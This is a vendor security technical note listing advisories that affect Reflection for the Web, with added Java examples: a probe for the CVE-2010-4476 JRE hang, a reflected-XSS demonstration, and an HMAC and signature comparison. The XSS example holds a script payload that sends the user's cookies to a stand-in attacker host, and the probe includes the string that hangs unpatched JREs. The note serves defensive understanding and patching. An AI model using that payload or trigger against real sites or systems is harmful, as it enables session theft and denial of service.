This technical note describes security issues related to the Reflection for the Web products listed in the Applies To section. If you rely on the security features of these products, you should consult this technical note on a regular basis for any updated information regarding these features.
The following security alerts and advisories may affect your product installation, or the security of your operating system or network environment. We recommend that you review these alerts and advisories.
Note: This information is not all-inclusive; it does not attempt to address every security issue that may affect your system.
IMPORTANT REMINDER: The security for all of the Attachmate products using the Attachmate security features depends upon the security of the operating system, host, and network environment. We strongly recommend that you evaluate and implement all relevant security service packs, updates, and patches recommended by your operating system, host, and network manufacturers. For more information, see Technical Note 2200.
| Alert | Vulnerability Summary for CVE-2013-0422 |
| Date Posted | January 2013 |
| Summary | Oracle Java 7 Update 10 or earlier allows remote attackers to execute arbitrary code, as exploited "in the wild" and demonstrated by exploit kits such as Blackhole and Nuclear Pack. Note: Oracle states that Java 6 is not affected. According to Oracle, to be successfully exploited, an unsuspecting user running an affected release in a browser needs to visit a malicious web page that leverages these vulnerabilities. Successful exploits can impact the availability, integrity, and confidentiality of the user's system. These vulnerabilities are not applicable to Java running on servers or within applications. |
| Product Status | Reflection for the Web itself is not subject to this vulnerability; however, its user and administrator web pages must be accessed from a browser with the Java plug-in enabled, and if you have configured the non-default option of starting sessions with Java Web Start (JNLP), user browsers must also have JNLP enabled. It is the Java plug-in and Web Start that can be exploited, not Reflection for the Web. Because exploitation only requires the browser to process a malicious page, the exposure exists on every user machine with the plug-in enabled, whether or not a Reflection for the Web session is ever launched. To minimize the risk on these systems, refer to the latest information provided by Oracle and install a version of Java that addresses this vulnerability. If you have upgraded to Java 7 Update 11, see Technical Note 2655 for information about the prompt "Do you want to run this application?" |
| Additional Information | For details, see the National Vulnerability Database at http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0422 and Oracle's site at http://www.oracle.com/technetwork/topics/security/alert-cve-2013-0422-1896849.html. |
| Alert | Multiple Oracle JRE Vulnerabilities in Java 6 Update 27 or earlier |
| Date Posted | December 2011 |
| Summary | Multiple security issues have been addressed in Oracle Java 6 Update 29. |
| Product Status | A hotfix has been issued for Reflection for the Web 2011 R1, updating the version of Java included in the automated installers to Java 6 Update 29. The hotfix is Reflection for the Web 2011 R1 Build 11.0[.nnn].527. To obtain a hotfix, contact Attachmate Technical Support, http://support.attachmate.com/contact/. Users running Reflection for the Web clients use the Java Runtime Environment and browser plug-in installed on their own machine, so the hotfix alone does not protect them. To resolve the issues addressed by this Oracle Java security update, update the JRE on user machines to Java 6 Update 29 or higher. |
| Additional Information | For details about the vulnerabilities fixed by Oracle in Java 6 Update 29, see the Oracle web site at http://www.oracle.com/technetwork/topics/security/javacpuoct2011-443431.html. |
| Alert | Multiple Oracle JRE Vulnerabilities in Java 6 Update 25 or earlier |
| Date Posted | December 2011 |
| Summary | Multiple security issues have been addressed in Oracle Java 6 Update 26. |
| Product Status | A hotfix has been issued for Reflection for the Web 2011 R1, updating the version of Java included in the automated installers to Java 6 Update 26. The hotfix is Reflection for the Web 2011 R1 Build 11.0[.nnn].500. A hotfix has also been issued for Reflection for the Web 2008 R3, updating the version of Java included in the automated installers to Java 6 Update 26. The hotfix is Reflection for the Web 2008 R3 Build 10.2[.nnn].527. To obtain a hotfix, contact Attachmate Technical Support, http://support.attachmate.com/contact/. Users running Reflection for the Web clients use the Java Runtime Environment and browser plug-in installed on their own machine, so the hotfix alone does not protect them. To resolve the issues addressed by this Oracle Java security update, update the JRE on user machines to Java 6 Update 26 or higher. |
| Additional Information | For details about the vulnerabilities fixed by Oracle in Java 6 Update 26, see the Oracle web site at http://www.oracle.com/technetwork/topics/security/javacpujune2011-313339.html. |
| Alert | Floating Point Number Vulnerability CVE-2010-4476 |
| Date Posted | November 2011 |
| Summary | Oracle Security Alert: "This Security Alert addresses security issue CVE-2010-4476 (Java Runtime Environment hangs when converting "2.2250738585072012e-308" to a binary floating-point number), which is a vulnerability in the Java Runtime Environment component of the Oracle Java SE and Java for Business products. This vulnerability allows unauthenticated network attacks (that is, it may be exploited over a network without the need for a username and password). Successful attack of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete Denial of Service) of the Java Runtime Environment. Java based application and web servers are especially at risk from this vulnerability." |
| Product Status | Reflection for the Web 2008 R3 builds 10.2[.nnn].526 and earlier, and earlier Reflection for the Web 2008 versions, include a Java version that is vulnerable to this issue. To resolve the issue, upgrade to Reflection for the Web 2008 R3 Build 527 (10.2[.nnn].527 or higher) or to Reflection for the Web 2011. If you installed Reflection for the Web manually, upgrade the Java version on the server to Java 6 Update 24 or higher. Users running Reflection for the Web clients use the Java Runtime Environment and browser plug-in installed on their own machine; to resolve the issue there, users must update their JRE to Java 6 Update 24 or higher. |
| Additional Information | For details, see the Oracle web site at http://www.oracle.com/technetwork/topics/security/alert-cve-2010-4476-305811.html and the National Vulnerability Database web site at http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-4476. |
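The following is an added check for the hang described in the Oracle alert above; it is not code from Reflection for the Web or from Oracle. It hands the string quoted in the alert to Double.parseDouble on a background thread and reports a JRE as vulnerable if the conversion has not returned within a timeout. The class name, the five-second limit and the exit codes are assumptions chosen for this example; the syntax avoids Java 7 and 8 features so it can be compiled and run against the Java 6 releases the alert covers.

```java
import java.util.concurrent.Callable;
import java.util.concurrent.ExecutionException;
import java.util.concurrent.ExecutorService;
import java.util.concurrent.Executors;
import java.util.concurrent.Future;
import java.util.concurrent.ThreadFactory;
import java.util.concurrent.TimeUnit;
import java.util.concurrent.TimeoutException;

/**
 * Added example (not Reflection for the Web code): probes the running JRE for
 * the CVE-2010-4476 hang by converting the literal from Oracle's alert with a
 * bounded wait. Class name and timeout are assumptions for this example.
 */
public class FloatHangCheck {

    /** The literal from Oracle's alert; an affected JRE loops forever converting it. */
    static final String TRIGGER = "2.2250738585072012e-308";

    /**
     * Returns true if the JRE converts TRIGGER within timeoutMillis, false if the
     * conversion is still running when the timeout expires (the CVE-2010-4476 hang).
     */
    public static boolean parsesInTime(long timeoutMillis) throws InterruptedException {
        // Daemon thread: if the parse spins forever it must not keep the JVM alive.
        ExecutorService pool = Executors.newSingleThreadExecutor(new ThreadFactory() {
            public Thread newThread(Runnable r) {
                Thread t = new Thread(r, "cve-2010-4476-probe");
                t.setDaemon(true);
                return t;
            }
        });
        try {
            Future<Double> result = pool.submit(new Callable<Double>() {
                public Double call() {
                    return Double.parseDouble(TRIGGER);
                }
            });
            result.get(timeoutMillis, TimeUnit.MILLISECONDS);
            return true;                   // returned: patched behaviour
        } catch (TimeoutException e) {
            return false;                  // still converting: affected JRE
        } catch (ExecutionException e) {
            return true;                   // threw rather than hung: not this bug
        } finally {
            pool.shutdownNow();            // cannot interrupt a spinning parse; see note
        }
    }

    public static void main(String[] args) throws InterruptedException {
        System.out.println("java.version = " + System.getProperty("java.version"));
        boolean ok = parsesInTime(5000L);
        if (ok) {
            System.out.println("parse returned: this JRE is not affected by CVE-2010-4476");
        } else {
            System.out.println("parse did not return within 5 s: this JRE is affected; "
                    + "upgrade to Java 6 Update 24 or higher");
        }
        // Non-zero exit status makes the result usable from a deployment script.
        System.exit(ok ? 0 : 1);
    }
}
```

Run this in a throwaway process: on an affected JRE the probe thread keeps one core busy until the JVM exits, because the loop inside the conversion cannot be interrupted. The trigger is kept as a String rather than written as a double literal in the source, since an affected compiler hangs on the literal in exactly the same way.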
| Alert | Cross-site Scripting Vulnerability |
| Date Posted | October 2010 |
| Summary | Certain versions of Reflection for the Web (Reflection for the Web 2008 R2 builds 10.1[.nnn].569 and earlier, Reflection for the Web 2008 R1, and Reflection for the Web 9.6 and earlier) have a non-persistent (reflected) cross-site scripting vulnerability, whereby malformed input can be reflected back to the user and executed as script within the user's web browser and within the security context of the user. The attacker would need to induce the user to voluntarily interact with the attack mechanism, for example by following a crafted link. The potential impact would depend on the configuration of the victim's browser and system. |
| Product Status | Reflection for the Web 2008 R2 builds 10.1[.nnn].570 or higher, and later versions, are not affected. Reflection for the Web 2008 R2 builds 10.1[.nnn].569 and earlier, Reflection for the Web 2008 R1, and Reflection for the Web 9.6 and earlier are affected. To determine which version of Reflection for the Web you are running, log in to the Administrative WebStation, click Resources, and then click About Reflection for the Web. We recommend upgrading to the current version. |
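The following is an added illustration of the reflected cross-site scripting pattern the advisory describes; it is not code from Reflection for the Web and says nothing about where that product's flaw was. A hypothetical page-rendering function is shown first copying a request parameter into the response verbatim, then hardened with HTML output encoding. The function names and the constructed payload are assumptions for this example.

```java
/**
 * Added example (not Reflection for the Web code): a hypothetical server-side
 * rendering function that reflects a request parameter, shown vulnerable and
 * then hardened with HTML output encoding.
 */
public class ReflectedInputDemo {

    // Constructed attacker-controlled input, e.g. the value of a query-string parameter.
    static final String PAYLOAD =
        "guest\"><script>document.location='http://attacker.example/?c='+document.cookie</script>";

    /** Vulnerable: the parameter is concatenated into the HTML response as-is. */
    public static String renderVulnerable(String userName) {
        return "<p>Welcome, <b>" + userName + "</b></p>";
    }

    /** Hardened: every user-controlled value is encoded for the HTML element context. */
    public static String renderHardened(String userName) {
        return "<p>Welcome, <b>" + htmlEscape(userName) + "</b></p>";
    }

    /**
     * Encodes the characters that can change HTML structure. Single quote and
     * slash are included so the same routine is safe inside quoted attributes.
     */
    public static String htmlEscape(String s) {
        StringBuilder out = new StringBuilder(s.length() + 16);
        for (int i = 0; i < s.length(); i++) {
            char c = s.charAt(i);
            switch (c) {
                case '&':  out.append("&amp;");  break;
                case '<':  out.append("&lt;");   break;
                case '>':  out.append("&gt;");   break;
                case '"':  out.append("&quot;"); break;
                case '\'': out.append("&#x27;"); break;
                case '/':  out.append("&#x2F;"); break;
                default:   out.append(c);
            }
        }
        return out.toString();
    }

    public static void main(String[] args) {
        String bad = renderVulnerable(PAYLOAD);
        String good = renderHardened(PAYLOAD);
        System.out.println("vulnerable: " + bad);
        System.out.println("hardened:   " + good);
        // The encoded output contains no tag for the browser to execute.
        System.out.println("script tag present in hardened output: " + good.contains("<script"));
    }
}
```

This encoding is correct for HTML element content and quoted attribute values only; a value placed inside a script block, an event handler or a URL needs the encoding for that context instead, and the safest fix in a web application is to apply the encoding at the point of output for every reflected parameter rather than to filter input.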
| Alert | Vulnerability Advisory CPNI-957037 |
| Date Posted | October 2010 - Modified October 2008 |
| Summary | A design flaw in the SSH protocol's use of block ciphers in cipher block chaining (CBC) mode could allow an attacker to recover up to four bytes of plaintext from an encrypted session. Although the severity of the attack is considered high, the likelihood of a successful attack is considered low: each attempt terminates the user's SSH connection, so an attack is both unreliable and noticeable. |
| Product Status | Beginning in Reflection for the Web 2008 R3, counter (CTR) mode cipher support is available. Note that the cipher is negotiated between client and server, so the SSH server must also offer a CTR mode cipher for the session to avoid CBC. For more information about how this vulnerability affects Attachmate products, see Technical Note 2398. |
| Additional Information | For details, see the US-CERT web site at http://www.kb.cert.org/vuls/id/958563. |
| Alert | US-CERT Vulnerability Note VU#845620 |
| Date Posted | September 5, 2006 |
| Summary | Multiple RSA implementations fail to properly handle signatures. |
| Product Status | Attachmate has determined that the usage of the RSA digital signature algorithm in Reflection for the Web is not subject to this vulnerability. |
| Additional Information | For details, see the CERT web site at http://www.kb.cert.org/vuls/id/845620. |
| Alert | US-CERT Vulnerability Note VU#680620 |
| Date Posted | July 14, 2005 |
| Summary | Buffer overflow vulnerability in the inflate() routine of versions 1.2.1 and 1.2.2 of the zlib data compression library. |
| Product Status | Reflection for the Web does not use zlib and is not subject to this vulnerability. The Java Runtime Environment on user machines carries its own copy of zlib for java.util.zip, so that component is covered by keeping the JRE current rather than by this product. |
| Additional Information | For details, see the CERT web site at http://www.kb.cert.org/vuls/id/680620. |
| Alert | Multiple iDEFENSE Security Advisories/US-CERT Vulnerability Note VU#800829 |
| Date Posted | July 7, 2005 |
| Summary | Multiple vendor telnet client information disclosure vulnerabilities. |
| Product Status | Reflection for the Web Telnet clients are not vulnerable to these issues: they return only limited terminal information in response to the telnet NEW-ENVIRON option (RFC 1572) and use dynamically sized buffering, so a server cannot read back environment data or overrun a fixed buffer through option negotiation. |
| Additional Information | For details about these vulnerabilities, see the iDefense advisories at http://www.idefense.com/application/poi/display?id=260&type=vulnerabilities, http://www.idefense.com/application/poi/display?id=220&type=vulnerabilities and http://www.idefense.com/application/poi/display?id=221&type=vulnerabilities, and the US-CERT note at http://www.kb.cert.org/vuls/id/800829. |
| Alert | Announcement of Successful Cryptanalytic Attack on SHA-1 |
| Summary | Three Chinese cryptanalysts from Shandong University documented a successful cryptanalytic attack on the SHA-1 algorithm in February 2005. The attack finds collisions, that is, two different inputs with the same SHA-1 hash, faster than brute force. |
| Product Status | Reflection products primarily use SHA-1 to create HMACs (keyed hashing for message authentication) for verification of message integrity. HMAC does not depend on the collision resistance of the underlying hash, and an attacker without the key cannot produce a valid tag, so, as Schneier notes, this use of SHA-1 is not affected by the cryptanalytic attack. (For further details, read the blog posting at http://www.schneier.com/blog/archives/2005/02/sha1_broken.html.) Digital signatures do depend on collision resistance, because a signature covers only the hash of the signed data. Over the next several versions of products that use the SHA-1 algorithm, all vendors, including Attachmate, will likely phase out the use of SHA-1 hashes in digital signatures and add support for SHA-256 and other stronger hashing algorithms. |
| Additional Information | Bruce Schneier, the author of "Applied Cryptography," discusses this announcement on his blog, Schneier on Security. For commentary on this topic, see http://www.schneier.com/blog/archives/2005/02/cryptanalysis_o.html. |
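The following is an added example of the two SHA-1 uses distinguished in the Product Status above; it is not Reflection for the Web code and does not show how that product constructs its HMACs. It computes and verifies an HMAC-SHA1 integrity tag, which the collision attack does not threaten, next to an RSA signature over SHA-1 and over SHA-256, the migration target the note names. The sample message, the freshly generated keys and the class name are assumptions for this example; only standard JDK APIs are used.

```java
import java.nio.charset.Charset;
import java.security.KeyPair;
import java.security.KeyPairGenerator;
import java.security.MessageDigest;
import java.security.SecureRandom;
import java.security.Signature;
import javax.crypto.Mac;
import javax.crypto.spec.SecretKeySpec;

/**
 * Added example (not Reflection for the Web code): HMAC-SHA1 for message
 * integrity beside RSA signatures over SHA-1 and SHA-256. Keys and message are
 * constructed here for illustration.
 */
public class HashUsageDemo {
    static final Charset UTF8 = Charset.forName("UTF-8");

    /** Computes an HMAC-SHA1 tag over message with the shared secret key. */
    public static byte[] hmacSha1(byte[] key, byte[] message) throws Exception {
        Mac mac = Mac.getInstance("HmacSHA1");
        mac.init(new SecretKeySpec(key, "HmacSHA1"));
        return mac.doFinal(message);
    }

    /** Verifies a tag; MessageDigest.isEqual does not stop at the first differing byte. */
    public static boolean verifyHmacSha1(byte[] key, byte[] message, byte[] tag) throws Exception {
        return MessageDigest.isEqual(hmacSha1(key, message), tag);
    }

    /** Signs message with RSA over the named digest, e.g. "SHA256withRSA" or legacy "SHA1withRSA". */
    public static byte[] sign(String algorithm, KeyPair kp, byte[] message) throws Exception {
        Signature s = Signature.getInstance(algorithm);
        s.initSign(kp.getPrivate());
        s.update(message);
        return s.sign();
    }

    public static boolean verify(String algorithm, KeyPair kp, byte[] message, byte[] sig) throws Exception {
        Signature s = Signature.getInstance(algorithm);
        s.initVerify(kp.getPublic());
        s.update(message);
        return s.verify(sig);
    }

    public static void main(String[] args) throws Exception {
        byte[] msg = "session record 42".getBytes(UTF8);      // constructed sample data
        byte[] tampered = "session record 43".getBytes(UTF8);

        // HMAC: without the key an attacker cannot forge a tag, and a colliding
        // pair of messages gives no advantage because the key enters the hash.
        byte[] key = new byte[20];
        new SecureRandom().nextBytes(key);
        byte[] tag = hmacSha1(key, msg);
        System.out.println("hmac ok on original: " + verifyHmacSha1(key, msg, tag));
        System.out.println("hmac ok on tampered: " + verifyHmacSha1(key, tampered, tag));

        // Signature: only the hash is signed, so two messages with the same hash
        // share one valid signature. That is why signatures move to SHA-256.
        KeyPairGenerator gen = KeyPairGenerator.getInstance("RSA");
        gen.initialize(2048);
        KeyPair kp = gen.generateKeyPair();
        byte[] legacy = sign("SHA1withRSA", kp, msg);
        byte[] modern = sign("SHA256withRSA", kp, msg);
        System.out.println("SHA1withRSA verifies:   " + verify("SHA1withRSA", kp, msg, legacy));
        System.out.println("SHA256withRSA verifies: " + verify("SHA256withRSA", kp, msg, modern));
    }
}
```

Switching the signature algorithm string is the whole client-side change for the migration the note anticipates, but the verifying side must accept the new algorithm, and any stored certificates or signed artifacts issued with SHA1withRSA remain SHA-1 signatures until they are reissued.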
| Alert | CERT Advisory CA-2003-26 |
| Summary | Multiple Vulnerabilities in SSL/TLS Implementations. |
| Product Status | Attachmate has inspected Reflection for the Web and determined that it is not vulnerable to the issues addressed in this alert. |
| Additional Information | For details, see http://www.cert.org/advisories/CA-2003-26.html. |
| Alert | CERT Advisory CA-2002-36 |
| Summary | Vulnerabilities in SSH2 Implementations from Multiple Vendors. |
| Product Status | Attachmate has tested Reflection for the Web with the test suite provided for this advisory and found that it is not vulnerable to the SSH2 connection initialization, key exchange, and negotiation phase attacks. |
| Additional Information | For details, see http://www.cert.org/advisories/CA-2002-36.html. |
Notice: This technical note is updated from time to time and is provided for informational purposes only. Attachmate makes no representation or warranty that the functions contained in our software products will meet your requirements or that the operation of our software products will be interruption or error free. Attachmate EXPRESSLY DISCLAIMS ALL WARRANTIES REGARDING OUR SOFTWARE INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE.